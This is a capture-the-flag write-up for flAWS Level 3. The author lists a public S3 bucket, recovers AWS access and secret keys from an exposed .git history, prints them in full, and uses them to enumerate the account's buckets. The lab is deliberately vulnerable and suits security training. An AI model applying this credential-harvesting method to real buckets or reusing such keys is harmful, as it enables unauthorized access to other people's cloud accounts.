in Uncategorized 1,056 Words

flAWS – AWS CTF – Level 3

Level 3 – Challenge statement:

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.

My approach:

Similar suggests S3 again, perhaps one with AWS access and secret keys in it.

We know that the bucket name to start from is level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Let’s first try public access, by browsing too: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Works!, seems to be a bunch of files in there.

Lets get a cleaner list by using the AWS CLI:

  ~$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --recursive
  2017-09-17 23:12:24         52 .git/COMMIT_EDITMSG
  2017-09-17 23:12:24         23 .git/HEAD
  2017-09-17 23:12:24        130 .git/config
  2017-09-17 23:12:24         73 .git/description
  2017-09-17 23:12:24        452 .git/hooks/applypatch-msg.sample
  2017-09-17 23:12:24        896 .git/hooks/commit-msg.sample
  2017-09-17 23:12:24        189 .git/hooks/post-update.sample
  2017-09-17 23:12:24        398 .git/hooks/pre-applypatch.sample
  2017-09-17 23:12:24       1704 .git/hooks/pre-commit.sample
  2017-09-17 23:12:24       4898 .git/hooks/pre-rebase.sample
  2017-09-17 23:12:24       1239 .git/hooks/prepare-commit-msg.sample
  2017-09-17 23:12:24       3611 .git/hooks/update.sample
  2017-09-17 23:12:24        600 .git/index
  2017-09-17 23:12:24        240 .git/info/exclude
  2017-09-17 23:12:24        359 .git/logs/HEAD
  2017-09-17 23:12:24        359 .git/logs/refs/heads/master
  2017-09-17 23:12:24        679 .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
  2017-09-17 23:12:24        770 .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
  2017-09-17 23:12:25        820 .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
  2017-09-17 23:12:25        245 .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
  2017-09-17 23:12:25     112013 .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
  2017-09-17 23:12:25        560 .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
  2017-09-17 23:12:25        191 .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  2017-09-17 23:12:25         42 .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
  2017-09-17 23:12:25        904 .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
  2017-09-17 23:12:25         98 .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
  2017-09-17 23:12:25        279 .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
  2017-09-17 23:12:25        125 .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
  2017-09-17 23:12:25         41 .git/refs/heads/master
  2017-02-27 08:14:33     123637 authenticated_users.png
  2017-02-27 08:14:34       1552 hint1.html
  2017-02-27 08:14:34       1426 hint2.html
  2017-02-27 08:14:35       1247 hint3.html
  2017-02-27 08:14:33       1035 hint4.html
  2017-02-27 10:05:16       1703 index.html
  2017-02-27 08:14:33         26 robots.txt

2 interesting bits here, namely authenticated_users.png and the .git directory contents.

Lets browse to have a look at the PNG first: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png

Ok thats nothing useful, just an image for the level 3 documentation…

Now lets poke around the .git directory…

Lets make a local copy first:

$ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/testtest --recursive

.git/COMMIT_EDITMSG contains the message: “Oops, accidentally added something I shouldn’t have” – which likely means that they did a commit inclusive of AWS keys…

Furthermore if I run git log I get:

  commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:43 2017 -0600

      Oops, accidentally added something I shouldn't have

  commit f52ec03b227ea6094b04e43f475fb0126edb5a61
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:07 2017 -0600

      first commit

This implies there is something in commit f52ec03b227ea6094b04e43f475fb0126edb5a61 that the developer didn’t want there, and removed it in commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526

Lets have a closer look at commit f52ec03b227ea6094b04e43f475fb0126edb5a61

git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61

Then lets look at what file(s) have popped out:

        ~/testtest$ ls
        access_keys.txt  authenticated_users.png  hint1.html  hint2.html  hint3.html  hint4.html  index.html  robots.txt

Oops, there is access_keys.txt, lets look

        ~/testtest$ cat access_keys.txt
        access_key AKIAJ366LIPB4IJKT7SA
        secret_access_key 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

Lets make another AWS configure profile using the newly discovered keys:

        ~/testtest$ aws configure --profile flawslevel3
        AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

Now let’s see if they are valid, and if any interesting S3 buckets are available:

        $ aws s3 ls --profile flawslevel3
        2017-02-19 03:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
        2017-05-30 00:34:53 config-bucket-975426262029
        2017-02-27 04:06:33 flaws-logs
        2017-02-19 03:40:54 flaws.cloud
        2017-02-24 13:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
        2017-02-27 02:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
        2017-02-27 02:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
        2017-02-27 03:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
        2017-02-27 03:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
        2017-02-27 04:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Indeed!, there are the bucket names for level 2 to the end.

Lets try browse to Level 4 publicly: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Level 4 unlocked.

Leave a comment